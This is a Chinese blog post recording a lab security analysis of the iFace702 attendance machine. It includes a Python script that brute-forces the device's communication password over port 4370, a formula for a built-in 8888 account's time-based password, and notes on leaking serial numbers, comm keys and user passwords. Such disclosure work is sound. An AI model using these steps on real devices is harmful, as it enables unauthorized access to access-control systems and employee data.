物联网设备iface702考勤机风险隐患分析记录

2024-11-29 20 0

本次实验室是为了分析物联网设备iface 702考勤机是否存在网络安全风险。经过实验记录来看,该设备接口比较脆弱。

telent连接

物联网设备iface702考勤机风险隐患分析记录插图

端口分析

Telnet进入后查看端口开放情况

发现8000端口

物联网设备iface702考勤机风险隐患分析记录插图1

数据库分析

8000端口疑似时钟服务器内置地址
物联网设备iface702考勤机风险隐患分析记录插图2

获得设备信息

使用该IP,本地监听泄漏SN、commkey信息
物联网设备iface702考勤机风险隐患分析记录插图3

通讯密码爆破

物联网设备iface702考勤机风险隐患分析记录插图4

from zk import ZK, const
ip = '10.97.218.209'

conn = None
for i in range(0,10001):
    # print(i)
    try:
        zk = ZK(ip, port=4370, timeout=5, password=i, force_udp=False, ommit_ping=True)
        conn = zk.connect()
        print("Password Found --> ",i)
        break
    except Exception as e:
        print(i,e)
    finally:
        if conn:
            conn.disconnect()

管理软件连接

爆破获得通讯密码12(12是我修改过的密码,默认为0)
输入ip地址、端口:4370、通讯密码:12、机器号:1

物联网设备iface702考勤机风险隐患分析记录插图5

易被当作后门利用的账户

内置用户,用户名8888,密码(9999-当前时间)²
如:当前时间20点33就是 (9999-2033)² =63457156
注:1分钟内输入否则密码会变

获取当前账户密码

除了内置账户,我们可以通过接口测试,获得当前账户密码,通过ID和密码可以登陆账户

物联网设备iface702考勤机风险隐患分析记录插图6


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

AI 安全案例分享:我是如何控制劫持AI助手的
深入了解失效对象级授权(BOLA):API安全的薄弱环节
内网渗透技术学习 | 代理与转发详解
数据安全包含哪些场景
深入挖掘:install4j更新机制中的XXE漏洞
渗透测试 | 入门必备的 JavaScript 基础知识

发布评论